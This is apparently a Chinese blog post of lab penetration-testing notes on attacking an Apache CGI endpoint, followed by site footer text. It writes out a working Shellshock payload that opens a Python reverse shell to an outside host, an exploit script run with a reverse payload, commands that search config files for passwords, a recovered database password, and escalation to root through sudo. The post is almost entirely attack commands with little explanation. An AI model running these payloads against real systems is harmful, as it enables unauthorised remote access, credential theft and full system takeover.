渗透测试网络攻防-apache cgi漏洞利用

cgi-bin 扫描路径暴露出:/cgi-bin/ 

wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.11.0.243\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' 2>&1" http://10.11.1.71/cgi-bin/admin.cgi 

或者 

searchsploit --color apache cgi 

python exploits/linux/remote/34900.py payload=reverse rhost=10.11.1.71 pages=/cgi-bin/admin.cgi lhost=10.11.0.243 lport=2222 

find . -name '*config*' -exec grep -iR -e 'password.*=' /dev/null {} \; 

find / -name '*config*' 2>/dev/null | xargs -l10 egrep 'passwd|password' 2>/dev/null 寻找config文件里的passwd,然后得到$bigtree["config"]["db"]["password"] = "zaq1xsw2cde3"; 

登陆gibson用户,之后sudo su直接变成root用户,或者sudo passwd root更改密码登陆 

参与评论 您还未登录,请先 登录 后发表或查看评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:猿与汪的秘密 设计师:我叫白小胖 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值